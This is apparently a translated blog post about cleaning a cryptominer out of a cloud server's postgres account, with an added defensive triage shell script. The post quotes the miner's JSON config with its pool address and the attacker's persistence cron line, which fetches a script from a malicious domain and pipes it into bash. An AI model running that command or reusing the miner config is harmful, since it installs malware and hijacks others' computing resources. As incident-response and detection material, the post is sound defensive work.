Alibaba Cloud server attacked, CPU pegged at full load
CPU usage at 99.9%
Over the past two days I noticed the server's CPU was constantly at full load. Checking top showed that a process called [ddns] belonging to postgres was consuming it all. Searching online for postgres CPU usage problems, every answer pointed to SQL queries, but I had stopped all my SQL and no queries were running, yet CPU usage was still close to 99.9%. Searching for ddns turned up nothing that explained why the CPU usage was so high.
Switching to the postgres user and running ps -ux showed this command: ./[ddns] --config=./[ddns].pid
Looking around I found a directory containing this file (at this point I still hadn't realized it was an attack):
find / -name '*ddns*'
[ddns].pid.bak contained an IP, 194.147.114.20:45543:
{
  "autosave": true,
  "background": true,
  "cpu": {
    "enabled": true,
    "huge-pages": true,
    "huge-pages-jit": false,
    "hw-aes": null,
    "priority": null,
    "memory-pool": false,
    "yield": true,
    "max-threads-hint": 70,
    "asm": true,
    "argon2-impl": null,
    "astrobwt-max-size": 550,
    "astrobwt-avx2": false,
    "cn/0": false,
    "cn-lite/0": false
  },
  "log-file": "/var/tmp/.../.ddns.log",
  "opencl": false,
  "cuda": false,
  "pools": [ { "url": "194.147.114.20:45543" } ]
}
An online IP lookup showed it was located in Switzerland.
I looked at what was being written to the /var/tmp/.../.ddns.log log file and realized I might have been attacked; after searching online I confirmed that it was an attack.
Running crontab -l as the postgres user showed a scheduled job that periodically fetches an a.sh.
Because of that, even kill -9 is useless: the job restores the process on schedule.
*/30 * * * * /bin/curl -fsSL http://crypto.htxreceive.top/s3f815/a/a.sh | bash > /dev/null 2>&1
Remove that user's crontab; if you have other scheduled jobs of your own, edit it with crontab -e instead.
crontab -r
Then delete the /var/tmp/.crypto directory and kill the process.
Check whether authorized_keys contains a key that allows password-less login.
If it does, delete that user and the file.
find / -name authorized_keys
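Added example, not code from the original post: a small POSIX shell triage script that covers the checks the post performs by hand (the cron line that pipes a download into bash, the pool URLs in the miner config, hidden files under /var/tmp, and the account's authorized_keys). The regex patterns, the `--live` flag and the sample values in the comments are my own assumptions; the live checks only run when that flag is passed.

```shell
#!/bin/sh
# Added example (not from the original post): triage helpers for the three
# indicators the post walks through: a cron job piping a remote script into a
# shell, a miner config listing pool URLs, and hidden files / SSH keys left
# under the compromised account. Paths and patterns here are assumptions.

# Print crontab lines that download a script and pipe it straight into a shell
# (the persistence pattern from the post: curl -fsSL http://... | bash).
flag_pipe_to_shell() {
    printf '%s\n' "$1" \
        | grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Extract every "url" value from an XMRig-style JSON config so the pool
# endpoints can be blocked at the firewall and reported.
extract_pool_urls() {
    printf '%s\n' "$1" \
        | grep -oE '"url"[[:space:]]*:[[:space:]]*"[^"]+"' \
        | sed -E 's/.*"([^"]+)"$/\1/'
}

# Live checks; run as the affected account (e.g. after su - postgres).
triage_user() {
    echo "== crontab entries piping a download into a shell =="
    flag_pipe_to_shell "$(crontab -l 2>/dev/null)" || echo "(none)"
    echo "== hidden files under /var/tmp (a common hiding place for miners) =="
    find /var/tmp -name '.*' -type f 2>/dev/null || true
    echo "== SSH keys that allow password-less login to this account =="
    cat "$HOME/.ssh/authorized_keys" 2>/dev/null || echo "(no authorized_keys)"
}

if [ "${1:-}" = "--live" ]; then
    triage_user
fi
```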
As for the cause, I suspect my postgres password was too simple, since everything was created under the postgres user.
For more detail, see this guy's post:
Alibaba Cloud server attacked by [crypto], causing 100% CPU (solved)
Original link: https://blog.csdn.net/weixin_43085094/article/details/122064395